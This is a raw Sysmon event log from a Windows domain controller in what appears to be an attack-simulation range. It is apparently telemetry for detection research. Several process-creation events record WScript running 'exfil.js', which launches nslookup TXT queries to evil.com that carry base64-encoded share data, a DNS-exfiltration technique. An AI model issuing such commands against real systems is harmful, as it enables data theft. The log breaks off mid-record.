10341000x8000000000000000203651Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.208{2E1864BB-17CB-629A-BE41-000000005F02}54728188C:\Windows\system32\cmd.exe{2E1864BB-17CB-629A-C041-000000005F02}5480C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203650Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.216{2E1864BB-17CB-629A-C041-000000005F02}5480C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CB-629A-BE41-000000005F02}5472C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltwn.tmp 2>&1 10341000x8000000000000000203649Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.192{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17CB-629A-BF41-000000005F02}336C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203648Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.176{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CB-629A-BF41-000000005F02}336C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203647Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.176{2E1864BB-17CB-629A-BF41-000000005F02}3365980C:\Windows\system32\conhost.exe{2E1864BB-17CB-629A-BE41-000000005F02}5472C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203646Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.161{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CB-629A-BF41-000000005F02}336C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203645Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.138{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203644Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.138{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203643Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.138{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203642Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.138{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203641Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.138{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CB-629A-BE41-000000005F02}5472C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203640Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.138{2E1864BB-17A1-629A-783D-000000005F02}55524336C:\Windows\System32\WScript.exe{2E1864BB-17CB-629A-BE41-000000005F02}5472C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203639Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.147{2E1864BB-17CB-629A-BE41-000000005F02}5472C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltwn.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203638Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.138{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlsuxm.tmpMD5=74AA98EC4B1C82029578D90E2343E510,SHA256=BCED258190799681E04DEC80A23A2247E8F332523DBBC8B2CBECAB9A40B2F90E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203637Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.076{2E1864BB-17CB-629A-BC41-000000005F02}63043384C:\Windows\system32\conhost.exe{2E1864BB-17CB-629A-BD41-000000005F02}8136C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203636Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.060{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203635Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.060{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203634Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.060{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203633Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.060{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203632Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.060{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CB-629A-BD41-000000005F02}8136C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203631Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.060{2E1864BB-17CB-629A-BB41-000000005F02}66762132C:\Windows\system32\cmd.exe{2E1864BB-17CB-629A-BD41-000000005F02}8136C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203630Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.072{2E1864BB-17CB-629A-BD41-000000005F02}8136C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CB-629A-BB41-000000005F02}6676C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsuxm.tmp 2>&1 10341000x8000000000000000203629Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.038{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17CB-629A-BC41-000000005F02}6304C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203628Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.038{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CB-629A-BC41-000000005F02}6304C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203627Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.022{2E1864BB-17CB-629A-BC41-000000005F02}63043384C:\Windows\system32\conhost.exe{2E1864BB-17CB-629A-BB41-000000005F02}6676C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203626Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.007{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CB-629A-BC41-000000005F02}6304C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203625Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.991{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203624Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.991{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203623Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.991{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203622Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.991{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203621Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.991{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CB-629A-BB41-000000005F02}6676C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203620Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.991{2E1864BB-17A1-629A-783D-000000005F02}55525884C:\Windows\System32\WScript.exe{2E1864BB-17CB-629A-BB41-000000005F02}6676C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\